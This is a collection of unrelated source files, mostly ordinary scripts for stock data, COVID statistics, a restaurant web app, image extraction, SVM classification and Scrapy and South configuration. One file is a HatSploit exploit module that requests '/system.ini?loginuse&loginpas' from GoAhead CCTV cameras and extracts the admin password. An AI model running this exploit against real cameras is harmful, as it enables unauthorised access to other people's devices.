stockData = stockData[~stockData.index.duplicated(keep='first')]
storeStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol, stockData)
message = message + ", nothing updated"
else:
message = ""
return startTime, message
def updateStockData_CHN(root_path, storeType, force_check = False):
symbols = getStocksList(root_path).index.values.tolist()
pbar = tqdm(total=len(symbols))
if storeType == 2:
for symbol in symbols:
startTime, message = updateSingleStockData(root_path, symbol, force_check)
outMessage = '%-*s fetched in: %.4s seconds' % (6, symbol, (time.time() - startTime))
pbar.set_description(outMessage)
pbar.update(1)
if storeType == 1:
log_errors = []
log_update = []
with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:
# Start the load operations and mark each future with its URL
future_to_stock = {executor.submit(updateSingleStockData, root_path, symbol, force_check): symbol for symbol in symbols}
for future in concurrent.futures.as_completed(future_to_stock):
stock = future_to_stock[future]
try:
startTime, message = future.result()
except Exception as exc:
startTime = time.time()
log_errors.append('%r generated an exception: %s' % (stock, exc))
else:
if len(message) > 0: log_update.append(message)
outMessage = '%-*s fetched in: %.4s seconds' % (6, stock, (time.time() - startTime))
pbar.set_description(outMessage)
pbar.update(1)
if len(log_errors) > 0: print(log_errors)
# if len(log_update) > 0: print(log_update)
pbar.close()
return symbols
if __name__ == "__main__":
pd.set_option('precision', 3)
pd.set_option('display.width',1000)
warnings.filterwarnings('ignore', category=pd.io.pytables.PerformanceWarning)
config = configparser.ConfigParser()
config.read(root_path + "/" + "config.ini")
storeType = int(config.get('Setting', 'StoreType'))
if storeType == 1:
from Start_DB_Server import StartServer, ShutdownServer
# start database server (async)
thread = StartServer(root_path)
# wait for db start, the standard procedure should listen to
# the completed event of function "StartServer"
time.sleep(5)
updateStockData_CHN(root_path, storeType)
if storeType == 1:
# stop database server (sync)
time.sleep(5)
ShutdownServer()
| [
"bluelight598@hotmail.com"
] | bluelight598@hotmail.com |
cf7421dbfc41eb8a9f6c8c4c9cbaf20c7230e672 | 7c2bc909efb6db08e57ed3dbff801bece3ac24c8 | /0x04-python-more_data_structures/10-best_score.py | 26dee3325ad643adcaaaa3e9d95024c01c2e8e0f | [] | no_license | EstephaniaCalvoC/holbertonschool-higher_level_programming | 9ed1009702b6aacb3b82b890e1798052adf40f33 | 93c6206b07d6cb51bcbee0bea4054343fca51fad | refs/heads/master | 2023-04-24T19:30:07.828255 | 2021-05-12T19:55:29 | 2021-05-12T19:55:29 | 319,314,341 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | #!/usr/bin/python3
def best_score(a_dictionary):
"""Return a key with the biggest integer value"""
return max(a_dictionary, key=a_dictionary.get) if a_dictionary else None
| [
"2177@holbertonschool.com"
] | 2177@holbertonschool.com |
de9e3acfbffdda6fd7604526072436235d2acd6a | 55ebfaee562197eb29694ee7d95d4073239bede1 | /webserver4.py | 9240a1bc8f206992a76f876e395754ad60698250 | [] | no_license | YuriyZaliznyuk/RestaurantMenu | 573561f7389c86db167dd36aaf2a5f8dd6d3e48a | 6af4511625718aabe5b9ee5ea0ccee6fd499b44d | refs/heads/master | 2021-03-12T21:56:57.893046 | 2015-07-17T15:37:07 | 2015-07-17T15:37:07 | 38,889,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,650 | py | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
# import CRUD Operations from Lesson 1
from database_setup import Base, Restaurant, MenuItem
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
# Create session and connect to DB
engine = create_engine('sqlite:///restaurantmenu.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
class webServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
# Objective 3 Step 2 - Create /restarants/new page
if self.path.endswith("/restaurants/new"):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><body>"
output += "<h1>Make a New Restaurant</h1>"
output += "<form method = 'POST' enctype='multipart/form-data' action = '/restaurants/new'>"
output += "<input name = 'newRestaurantName' type = 'text' placeholder = 'New Restaurant Name'>"
output += "<input type='submit' value='Create'>"
output += "</form></html></body>"
self.wfile.write(output)
return
if self.path.endswith("/edit"):
restaurantIDPath = self.path.split("/")[2]
myRestaurantQuery = session.query(Restaurant).filter_by(id = restaurantIDPath).one()
if myRestaurantQuery:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = "<html><body>"
output += "<h1>"
output += myRestaurantQuery.name
output += "</h1>"
output += "<form method='POST' enctype='multipart/form-data' action = '/restaurants/%s/edit' >" % restaurantIDPath
output += "<input name = 'newRestaurantName' type='text' placeholder = '%s' >" % myRestaurantQuery.name
output += "<input type = 'submit' value = 'Rename'>"
output += "</form>"
output += "</body></html>"
self.wfile.write(output)
if self.path.endswith("/restaurants"):
restaurants = session.query(Restaurant).all()
output = ""
# Objective 3 Step 1 - Create a Link to create a new menu item
output += "<a href = '/restaurants/new' > Make a New Restaurant Here </a></br></br>"
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output += "<html><body>"
for restaurant in restaurants:
output += restaurant.name
output += "</br>"
# Objective 2 -- Add Edit and Delete Links
# Objective 4 -- Replace Edit href
output += "<a href ='/restaurants/%s/edit' >Edit </a> " % restaurant.id
output += "</br>"
output += "<a href =' #'> Delete </a>"
output += "</br></br></br>"
output += "</body></html>"
self.wfile.write(output)
return
except IOError:
self.send_error(404, 'File Not Found: %s' % self.path)
# Objective 3 Step 3- Make POST method
def do_POST(self):
try:
if self.path.endswith("/edit"):
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
messagecontent = fields.get('newRestaurantName')
restaurantIDPath = self.path.split("/")[2]
myRestaurantQuery = session.query(Restaurant).filter_by(id = restaurantIDPath).one()
if myRestaurantQuery != []:
myRestaurantQuery.name = messagecontent[0]
session.add(myRestaurantQuery)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurants')
self.end_headers()
if self.path.endswith("/restaurants/new"):
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
messagecontent = fields.get('newRestaurantName')
# Create new Restaurant Object
newRestaurant = Restaurant(name=messagecontent[0])
session.add(newRestaurant)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurants')
self.end_headers()
except:
pass
def main():
try:
server = HTTPServer(('', 8080), webServerHandler)
print 'Web server running...open localhost:8080/restaurants in your browser'
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down server'
server.socket.close()
if __name__ == '__main__':
main() | [
"yuriy.zaliznyuk@gmail.com"
] | yuriy.zaliznyuk@gmail.com |
e0b39a708b67f44501522e21058f0a57a5d4d895 | 727d968a63a6dfdd05a7e0f7abc1a3be7a910ca3 | /covid_api_github.py | 0869f9779309cd74f0c016051880af43e0697ef9 | [] | no_license | ericstar20/COVID19_api | 3a4501f905172b9705e72798af8d9bb4027a2a9a | 4313e073992a975878088135a09cf9bc6e951175 | refs/heads/master | 2022-11-27T21:54:06.581868 | 2020-07-17T16:27:04 | 2020-07-17T16:27:04 | 280,244,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,926 | py | def covid_api_sql():
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# API
import requests
import json
# DB
import pymysql
from sqlalchemy import create_engine
pymysql.install_as_MySQLdb()
# AWS
import aws_config
# Set up API keys to get access permission
def getStats(country):
api_url = 'https://api.smartable.ai/coronavirus/stats/'+country
api_params = {
'Cache-Control': 'no-cache',
'Subscription-Key': 'your key',
}
r = requests.get(url=api_url, params=api_params)
return r.text
# Get Data
data = getStats('global')
jsonData = json.loads(data)
jsonData.keys()
# Create three dataframe. One is Global total, the other is each country(state) info.
# Global df
update_T = jsonData['updatedDateTime']
totalConfirmedCases = jsonData['stats']['totalConfirmedCases']
newlyConfirmedCases = jsonData['stats']['newlyConfirmedCases']
totalDeaths = jsonData['stats']['totalDeaths']
newDeaths = jsonData['stats']['newDeaths']
totalRecoveredCases = jsonData['stats']['totalRecoveredCases']
newlyRecoveredCases = jsonData['stats']['newlyRecoveredCases']
global_list = [[update_T, totalConfirmedCases, totalDeaths, totalRecoveredCases, newlyConfirmedCases, newDeaths, newlyRecoveredCases]]
global_col = ['updateTime', 'totalConfirmedCases', 'totalDeaths', 'totalRecoveredCases', 'newlyConfirmedCases', 'newDeaths', 'newlyRecoveredCases']
global_df = pd.DataFrame(data=global_list, columns = global_col)
global_df['updateTime']=pd.to_datetime(global_df['updateTime'])
#global_df.head()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# histroy df
history_df = pd.DataFrame(jsonData['stats']['history'])
history_df['date']=pd.to_datetime(history_df['date'])
#history_df.head()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Stats df
stats = pd.DataFrame(jsonData['stats']['breakdowns'])
location_norm = pd.json_normalize(stats['location'])
stats_df = pd.concat([location_norm, stats], axis=1).drop('location', axis=1)
stats_df['updateTime'] = update_T
stats_df['updateTime']=pd.to_datetime(stats_df['updateTime'])
#stats_df.head()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Open database connection (local)
db = pymysql.connect("host","name","password","database name" )
# prepare a cursor object using cursor() method
cursor = db.cursor()
# execute SQL query using execute() method.
cursor.execute("SELECT VERSION()")
# Fetch a single row using fetchone() method.
data = cursor.fetchone()
# print ("Database version : %s " % data)
# disconnect from server
db.close()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Insert dfs to locl mysql
engine = create_engine('mysql://name:password@host:port/database') #change to connect your mysql
#if you want to create a new table
global_df.to_sql(name='globalView',con=engine,if_exists='replace',index=False)
history_df.to_sql(name='history',con=engine,if_exists='replace',index=False)
stats_df.to_sql(name='statsView',con=engine,if_exists='replace',index=False)
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Open database connection (AWS)
connection = pymysql.connect(host=aws_config.host,
user=aws_config.user,
password=aws_config.passwd)
with connection:
cur = connection.cursor()
cur.execute("SELECT VERSION()")
version = cur.fetchone()
#print("Database version: {} ".format(version[0]))
# Insert dfs to locl mysql
engine = create_engine('mysql://{}:{}@{}:{}/{}'.format(aws_config.user,aws_config.passwd,aws_config.host,aws_config.port,aws_config.db_name)) #change to connect your mysql
#if you want to create a new table
global_df.to_sql(name='globalView',con=engine,if_exists='replace',index=False)
history_df.to_sql(name='history',con=engine,if_exists='replace',index=False)
stats_df.to_sql(name='statsView',con=engine,if_exists='replace',index=False)
| [
"noreply@github.com"
] | ericstar20.noreply@github.com |
c4fd4774aaf0e10c3720251b62ae4f7fd5eca3ae | 437428a48278b4e9bc04e1b8acbb33199f409376 | /modules/exploit/unix/cctv/goahead_password_disclosure.py | ae2a949fa5f2033187282244644b19db5808d163 | [
"MIT"
] | permissive | happylaodu/HatSploit | 06d18ba2590456241ba61273d9f3d662a8bb26ec | 9d53f3db85ce38483c6e7d16570ac233c5dd93cf | refs/heads/main | 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.lib.module import Module
from utils.http.http import HTTPClient
from utils.string.string import StringTools
class HatSploitModule(Module, HTTPClient, StringTools):
details = {
'Name': "CCTV GoAhead Camera Password Disclosure",
'Module': "exploit/unix/cctv/goahead_password_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'Pierre Kim (pierrekim)'
],
'Description': "CCTV GoAhead Camera password disclosure exploit.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Default username.",
'Value': "admin",
'Type': None,
'Required': True
}
}
def exploit(self, remote_host, remote_port, username):
self.output_process("Generating payload...")
payload = '/system.ini?loginuse&loginpas'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path=payload
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
gathered_data = response.text
strings = self.extract_strings(gathered_data)
if username in strings:
username_index = strings.index(username)
password = strings[username_index + 1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.output_warning(f"Target vulnerable, but default username is not {username}.")
def run(self):
remote_host, remote_port, username = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port, username)
| [
"enty8080@gmail.com"
] | enty8080@gmail.com |
e0d4813f092a2ac5c5e8a38b53dd058711758ebb | cf6e0374bede75062e9da39895ae576d07f4839c | /extract-AP-Images/extract-AP-images.py | 7f422fcd27470e9b79c3e843b759dd4804357a3a | [] | no_license | gingmar/semfio-ekahau | 6e74017f699e8aa895b70cf3b62ad39d4096fd4a | fa04ed243c51093e4f82b8e2f25fe02d6eeae66d | refs/heads/master | 2023-07-07T16:57:43.054514 | 2021-08-24T01:25:56 | 2021-08-24T01:25:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,042 | py | """
Written by Francois Verges (@VergesFrancois)
This script will extract all image notes attached to an AP objects of an
Ekahau project file (.esx). It will place the pictures in a new directory.
Sub directories will be created for each floors.
This script will also work if you have multiple pictures per AP note
Currently working for Ekahau version 10.2, 10.1 & 10 project files
"""
import argparse
import time
import zipfile
import json
import shutil
import pathlib
import os
def main():
"""
This function will extract the images located into the AP notes and rename them using the AP Name
"""
parser = argparse.ArgumentParser(description='Extract images located in the AP notes and rename them using the AP name')
parser.add_argument('file', metavar='esx_file', help='Ekahau project file')
args = parser.parse_args()
# Load & Unzip the Ekahau Project File
current_filename = pathlib.PurePath(args.file).stem
with zipfile.ZipFile(args.file,'r') as myzip:
myzip.extractall(current_filename)
# Load the notes.json file into the notes Dictionary
with myzip.open('notes.json') as json_file:
notes = json.load(json_file)
# Load the accessPoints.json file into the accessPoints dictionary
with myzip.open('accessPoints.json') as json_file:
accessPoints = json.load(json_file)
# Load the floorPlans.json file into the floorPlans dictionary
with myzip.open('floorPlans.json') as json_file:
floorPlans = json.load(json_file)
# Create a new directory to place the new image in
newpath = os.path.abspath(pathlib.PurePath()) + "/AP-Images"
if not os.path.exists(newpath):
os.makedirs(newpath)
# Create one sub directory per floor under the /AP-Images directrory
for floor in floorPlans['floorPlans']:
sub = newpath + '/' + floor['name']
if not os.path.exists(sub):
os.makedirs(sub)
# Move all the AP Images on this floor into the corresponding directory
for ap in accessPoints['accessPoints']:
if 'location' in ap.keys() and len(ap['noteIds']) > 0:
if ap['location']['floorPlanId'] == floor['id']:
if 'noteIds' in ap.keys():
count = 0
for noteId in ap['noteIds']:
for note in notes['notes']:
if note['id'] == noteId and len(note['imageIds']) > 0:
image_count = count + 1
for image in note['imageIds']:
image_full_path = os.getcwd() + '/' + current_filename + '/image-' + image
if len(note['imageIds']) > 1 or len(ap['noteIds']) > 1:
dst = newpath + '/' + floor['name'] + '/'+ ap['name'] + '-' + str(image_count) + '.png'
else:
dst = newpath + '/' + floor['name'] + '/'+ ap['name'] + '.png'
shutil.copy(image_full_path, dst)
image_count += 1
count = image_count - 1
# Clean Up
shutil.rmtree(current_filename)
if __name__ == "__main__":
start_time = time.time()
print('** Extracting AP picture notes...')
main()
run_time = time.time() - start_time
print("** Time to run: %s sec" % round(run_time,2))
| [
"fverges@semfionetworks.com"
] | fverges@semfionetworks.com |
ef567234d6477e2d147942c523b0ffd84b76b2c7 | 8f453ebb619acb23d2925f7ceb9b0c244e645390 | /ClassifyParkinsons.py | 0f2b46ca449a357c52c165eda6b0830490adb626 | [] | no_license | pranithasurya/MachineLearning | 5fa6927d03a29ac5ec60a0cab1096bafdc6b80fe | 2d07da75335867eba1591841351c3db351d07c23 | refs/heads/master | 2021-01-10T05:17:50.137654 | 2016-01-18T05:48:16 | 2016-01-18T05:48:16 | 49,853,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,467 | py | import numpy as np
from sklearn import svm
from sklearn.metrics import accuracy_score
def loadData():
file=open("parkinsons/data")
line=file.readline()
result=[]
while(line!=''):
a=line.split()
a=map(float,a)
result.append(a)
line=file.readline()
a=np.array(result)
print a
return a
def loadTrueClass():
file=open("parkinsons/trueclass")
line=file.readline()
result=[]
while(line!=''):
a=line.split()
a=map(int,a)
result.append(a)
line=file.readline()
a=np.array(result)
return a
def loadTrainingData(x):
f=open("Parkinsons/random_class.%d" %x,"r")
print "------------------------------------------------------------------------------"
print "Parkinsons/random_class.%d"%x
line=f.readline()
result=[]
while(line!=''):
a=line.split()
result.append(a)
line=f.readline()
a=np.array(result)
a=a.astype(int)
return a
def classify(data, trueclass, traindata, final_set,a):
X=np.vstack(data[traindata[:,1],:])
#np.savetxt("parkinsons/foo.csv",x, fmt='%0.5f',delimiter=",")
b=[]
b.append(traindata[:,1])
C = np.searchsorted(a, b)
D = np.delete(np.arange(np.alen(a)), C)
D= np.array(D)
D=D.reshape(D.size,-1)
true_labels = np.ravel(np.vstack(trueclass[D[:,0],0]))
test_data = np.vstack(data[D[:,0],:])
#print test_data.shape
#np.savetxt("parkinsons/foo.csv",test_data, fmt='%0.6s')
y=np.ravel(np.vstack(traindata[:,0]))
clf=svm.SVC(kernel='linear')
clf.fit(X,y)
labels=clf.predict(test_data) #predicting true labels for the remaining rows
predicted_labels = labels.reshape(labels.size,-1)
np.savetxt("parkinsons/foo%d.csv"%final_set, np.concatenate((test_data, predicted_labels,np.vstack(trueclass[D[:,0],0])), axis=1),fmt='%0.5f',delimiter=",")
print true_labels
print labels
misclassify_rate = 1-accuracy_score(true_labels,labels)
print "Misclassification rate = %f" %misclassify_rate
return misclassify_rate
data = loadData() #loading original data
trueclass = loadTrueClass() #loading true labels
error=0
for i in range(0,10,1): #looping through 10 training data sets
traindata=loadTrainingData(i) #loading each training file
a=[]
for j in range(0,195,1):
a.append(j)
misclassify_rate=classify(data, trueclass, traindata,i,a) #classification based on each training set. Also the parameter passing is call by value here
error = error+misclassify_rate
print error
error = error/10 #average of error across 10 training sets
print "Average Error= %0.3f" %error
| [
"pranitha.andalam@gmail.com"
] | pranitha.andalam@gmail.com |
ec20e0f130c9b07be9f40df8385ecc71d1678676 | 1b3fc35ada474601a76de3c2908524336d6ca420 | /day07/作业/tencent/tencent/settings.py | d96bd9dfc78cc95ce6fafa6d33a2745ee7a9c4af | [] | no_license | dqsdatalabs/Internet-worm | db3677e65d11542887adcde7719b7652757a3e32 | 62f38f58b4fa7643c482077f5ae18fff6fd81915 | refs/heads/master | 2022-01-16T14:29:52.184528 | 2018-12-25T08:46:08 | 2018-12-25T08:46:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,079 | py | # -*- coding: utf-8 -*-
# Scrapy settings for tencent project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'tencent'
SPIDER_MODULES = ['tencent.spiders']
NEWSPIDER_MODULE = 'tencent.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'tencent (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'tencent.middlewares.TencentSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'tencent.middlewares.TencentDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'tencent.pipelines.TencentPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"aaa1058169464@126.com"
] | aaa1058169464@126.com |
b2625f2e12494973dd673cb354d1c0ce6a6f5a40 | 9ffc948ff6633a1876883b97f3b2ce12e733e094 | /Programs/catnames.py | c384d4079a5d7d8d65d696da554445d95ca9ad64 | [] | no_license | SrinuBalireddy/Python_Snippets | b529c4b93e774970a7e5a7961fdca89cc4732b46 | f032887b1c7ec261aa70adf03bcf0a43acef75ad | refs/heads/master | 2022-12-18T17:37:36.488430 | 2020-09-08T09:59:36 | 2020-09-08T09:59:36 | 274,892,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | # Write your code here :-)
catnames = []
while True:
print('Enter you cat name')
name = input()
if name == '':
break
catnames = catnames+[name]
print('Your cat names are')
for names in catnames:
print(' '+names)
| [
"srinuuipath@gmail.com"
] | srinuuipath@gmail.com |
554e52f3092452144023bde3ebfbf39ccb24dc5c | 773869c5d8c85c56027bc453ad2cb3cd0fd8d46a | /pie chart.py | e7d14d2d8262b1b467d4db21051dff1292ffbcc4 | [] | no_license | saikiran335/python-projects | c8ac60f3977f5cc693b4c373a06b6b325edd8ffa | bb1409c427fd99f2c180fc24bc76d401717aee78 | refs/heads/master | 2023-05-01T17:10:15.851278 | 2021-05-25T10:23:06 | 2021-05-25T10:23:06 | 365,147,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | import matplotlib.pyplot as plt
slices=[5,2,7,8]
activities=['sleeping','eating','walking','talking']
cols=['r','b','g','c']
plt.pie(slices,
labels=activities,
colors=cols,
startangle=90,
shadow=True,
explode=[0,0.1,0.2,0.3],
autopct='%1.1f%%')
plt.title('pie chart')
plt.show()
| [
"saisaikiran335@gmail.com"
] | saisaikiran335@gmail.com |
94dabe5bc97142793e56abc7a975599c561890d5 | a707013b51935acd329814d8cc9dc408911a9cfa | /cmsplugin_configurableproduct/migrations/0007_auto__del_field_cproducttypesplugin_template__add_field_cproducttypesp.py | 9af2b6d9d79304ef9ebdfa2b05f3bdf7b6242d78 | [
"BSD-2-Clause"
] | permissive | ZibMedia/cmsplugin-configurableproduct | 2d4ff3b4f09210a6d448251b9bdec01d0214b344 | 65269b3ce697ac78ddff14168eed9b6883eb98f0 | refs/heads/master | 2021-01-24T01:28:47.826763 | 2013-05-28T11:17:22 | 2013-05-28T11:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,090 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: replaces the single 'template' column on the
    CProductTypesPlugin / CProductsPlugin plugin tables with a pair of
    'container_template' / 'item_template' columns.
    NOTE(review): South-generated migration — prefer regenerating over
    hand-editing; the frozen `models` snapshot below must stay in sync.
    """
    def forwards(self, orm):
        """Apply the change: drop 'template', add the two new columns."""
        # Deleting field 'CProductTypesPlugin.template'
        db.delete_column('cmsplugin_cproducttypesplugin', 'template')
        # Adding field 'CProductTypesPlugin.container_template'
        db.add_column('cmsplugin_cproducttypesplugin', 'container_template', self.gf('django.db.models.fields.CharField')(default=('Default', 'cmsplugin_configurableproduct/product-types/containers/default.html'), max_length=256, null=True, blank=True), keep_default=False)
        # Adding field 'CProductTypesPlugin.item_template'
        db.add_column('cmsplugin_cproducttypesplugin', 'item_template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
        # Deleting field 'CProductsPlugin.template'
        db.delete_column('cmsplugin_cproductsplugin', 'template')
        # Adding field 'CProductsPlugin.container_template'
        db.add_column('cmsplugin_cproductsplugin', 'container_template', self.gf('django.db.models.fields.CharField')(default=('Default', 'cmsplugin_configurableproduct/product-list/containers/default.html'), max_length=256, null=True, blank=True), keep_default=False)
        # Adding field 'CProductsPlugin.item_template'
        db.add_column('cmsplugin_cproductsplugin', 'item_template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
    def backwards(self, orm):
        """Revert the change: restore 'template', drop the new columns."""
        # Adding field 'CProductTypesPlugin.template'
        db.add_column('cmsplugin_cproducttypesplugin', 'template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
        # Deleting field 'CProductTypesPlugin.container_template'
        db.delete_column('cmsplugin_cproducttypesplugin', 'container_template')
        # Deleting field 'CProductTypesPlugin.item_template'
        db.delete_column('cmsplugin_cproducttypesplugin', 'item_template')
        # Adding field 'CProductsPlugin.template'
        db.add_column('cmsplugin_cproductsplugin', 'template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
        # Deleting field 'CProductsPlugin.container_template'
        db.delete_column('cmsplugin_cproductsplugin', 'container_template')
        # Deleting field 'CProductsPlugin.item_template'
        db.delete_column('cmsplugin_cproductsplugin', 'item_template')
    # Frozen ORM snapshot used by South to reconstruct model state; generated.
    models = {
        'cms.cmsplugin': {
            'Meta': {'object_name': 'CMSPlugin'},
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
            'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
            'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
            'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.placeholder': {
            'Meta': {'object_name': 'Placeholder'},
            'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
        },
        'cmsplugin_configurableproduct.cproductsplugin': {
            'Meta': {'object_name': 'CProductsPlugin', 'db_table': "'cmsplugin_cproductsplugin'", '_ormbases': ['cms.CMSPlugin']},
            'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['configurableproduct.ProductType']", 'symmetrical': 'False'}),
            'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
